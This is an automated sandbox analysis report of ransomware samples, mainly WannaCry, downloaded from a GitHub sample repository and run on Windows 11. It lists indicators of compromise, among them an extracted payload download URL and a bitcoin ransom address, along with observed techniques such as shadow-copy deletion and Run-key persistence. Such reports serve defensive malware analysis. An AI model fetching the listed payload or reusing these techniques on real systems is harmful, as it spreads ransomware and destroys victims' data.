Analysis
-
max time kernel
515s -
max time network
519s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-05-2024 20:49
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip
Resource
win11-20240426-en
General
-
Target
https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip
Malware Config
Extracted
http://french-cooking.com/myguy.exe
Extracted
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
wannacry
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 40 2924 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Drops startup file 3 IoCs
Processes:
svchost.exeed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD71AA.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD71C1.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Executes dropped EXE 22 IoCs
Processes:
taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exepid process 1588 taskdl.exe 664 @[email protected] 2436 @[email protected] 3492 taskhsvc.exe 2732 taskdl.exe 4556 taskse.exe 3288 @[email protected] 1756 taskdl.exe 4632 taskse.exe 2812 @[email protected] 1412 taskse.exe 2388 @[email protected] 1980 taskdl.exe 4940 taskse.exe 2116 @[email protected] 3680 taskdl.exe 4620 taskse.exe 2528 @[email protected] 4520 taskdl.exe 2088 taskse.exe 3392 @[email protected] 4228 taskdl.exe -
Loads dropped DLL 9 IoCs
Processes:
taskhsvc.exepid process 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\czxlscessk897 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" reg.exe -
Drops desktop.ini file(s) 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\assembly\Desktop.ini svchost.exe File opened for modification C:\Windows\assembly\Desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]description ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Drops file in Windows directory 3 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\assembly\Desktop.ini svchost.exe File opened for modification C:\Windows\assembly svchost.exe File created C:\Windows\assembly\Desktop.ini svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2388 2436 WerFault.exe @[email protected] 3884 2436 WerFault.exe @[email protected] -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 11 IoCs
Processes:
msedge.exesvchost.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA svchost.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.WannaCry (1).zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.Cerber.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.Vipasana.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.Petya.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Ransomware.Petya (1).zip:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exemsedge.exemsedge.exetaskhsvc.exepid process 484 msedge.exe 484 msedge.exe 2800 msedge.exe 2800 msedge.exe 2552 msedge.exe 2552 msedge.exe 4700 identity_helper.exe 4700 identity_helper.exe 5040 msedge.exe 5040 msedge.exe 4228 msedge.exe 4228 msedge.exe 4228 msedge.exe 4228 msedge.exe 1756 msedge.exe 1756 msedge.exe 3020 msedge.exe 3020 msedge.exe 4896 msedge.exe 4896 msedge.exe 1992 msedge.exe 1992 msedge.exe 4224 msedge.exe 4224 msedge.exe 4344 msedge.exe 4344 msedge.exe 1772 msedge.exe 1772 msedge.exe 2924 powershell.exe 2924 powershell.exe 1236 msedge.exe 1236 msedge.exe 3668 msedge.exe 3668 msedge.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe 3492 taskhsvc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3288 @[email protected] -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
Processes:
msedge.exepid process 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe -
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes:
powershell.exesvchost.exeWMIC.exevssvc.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exedescription pid process Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 3124 svchost.exe Token: 33 3124 svchost.exe Token: SeIncBasePriorityPrivilege 3124 svchost.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeSecurityPrivilege 1516 WMIC.exe Token: SeTakeOwnershipPrivilege 1516 WMIC.exe Token: SeLoadDriverPrivilege 1516 WMIC.exe Token: SeSystemProfilePrivilege 1516 WMIC.exe Token: SeSystemtimePrivilege 1516 WMIC.exe Token: SeProfSingleProcessPrivilege 1516 WMIC.exe Token: SeIncBasePriorityPrivilege 1516 WMIC.exe Token: SeCreatePagefilePrivilege 1516 WMIC.exe Token: SeBackupPrivilege 1516 WMIC.exe Token: SeRestorePrivilege 1516 WMIC.exe Token: SeShutdownPrivilege 1516 WMIC.exe Token: SeDebugPrivilege 1516 WMIC.exe Token: SeSystemEnvironmentPrivilege 1516 WMIC.exe Token: SeRemoteShutdownPrivilege 1516 WMIC.exe Token: SeUndockPrivilege 1516 WMIC.exe Token: SeManageVolumePrivilege 1516 WMIC.exe Token: 33 1516 WMIC.exe Token: 34 1516 WMIC.exe Token: 35 1516 WMIC.exe Token: 36 1516 WMIC.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeSecurityPrivilege 1516 WMIC.exe Token: SeTakeOwnershipPrivilege 1516 WMIC.exe Token: SeLoadDriverPrivilege 1516 WMIC.exe Token: SeSystemProfilePrivilege 1516 WMIC.exe Token: SeSystemtimePrivilege 1516 WMIC.exe Token: SeProfSingleProcessPrivilege 1516 WMIC.exe Token: SeIncBasePriorityPrivilege 1516 WMIC.exe Token: SeCreatePagefilePrivilege 1516 WMIC.exe Token: SeBackupPrivilege 1516 WMIC.exe Token: SeRestorePrivilege 1516 WMIC.exe Token: SeShutdownPrivilege 1516 WMIC.exe Token: SeDebugPrivilege 1516 WMIC.exe Token: SeSystemEnvironmentPrivilege 1516 WMIC.exe Token: SeRemoteShutdownPrivilege 1516 WMIC.exe Token: SeUndockPrivilege 1516 WMIC.exe Token: SeManageVolumePrivilege 1516 WMIC.exe Token: 33 1516 WMIC.exe Token: 34 1516 WMIC.exe Token: 35 1516 WMIC.exe Token: 36 1516 WMIC.exe Token: SeBackupPrivilege 1052 vssvc.exe Token: SeRestorePrivilege 1052 vssvc.exe Token: SeAuditPrivilege 1052 vssvc.exe Token: SeTcbPrivilege 4556 taskse.exe Token: SeTcbPrivilege 4556 taskse.exe Token: SeTcbPrivilege 4632 taskse.exe Token: SeTcbPrivilege 4632 taskse.exe Token: SeTcbPrivilege 1412 taskse.exe Token: SeTcbPrivilege 1412 taskse.exe Token: SeTcbPrivilege 4940 taskse.exe Token: SeTcbPrivilege 4940 taskse.exe Token: SeTcbPrivilege 4620 taskse.exe Token: SeTcbPrivilege 4620 taskse.exe Token: SeTcbPrivilege 2088 taskse.exe Token: SeTcbPrivilege 2088 taskse.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe -
Suspicious use of SendNotifyMessage 16 IoCs
Processes:
msedge.exepid process 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
pid process 664 @[email protected] 664 @[email protected] 2436 @[email protected] 2436 @[email protected] 3288 @[email protected] 3288 @[email protected] 2812 @[email protected] 2388 @[email protected] 2116 @[email protected] 2528 @[email protected] 3392 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2800 wrote to memory of 4188 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4188 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2076 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 484 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 484 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4788 2800 msedge.exe msedge.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1516 attrib.exe 3424 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa58563cb8,0x7ffa58563cc8,0x7ffa58563cd82⤵PID:4188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:2076
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:484 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:82⤵PID:4788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:4932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:1188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2552 -
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4700 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:12⤵PID:492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵PID:3760
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵PID:4168
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:3964
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:12⤵PID:4956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5040 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1712 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4228 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:12⤵PID:4844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1756 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:12⤵PID:3044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3020 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:1812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4896 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:12⤵PID:4648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 /prefetch:82⤵
- NTFS ADS
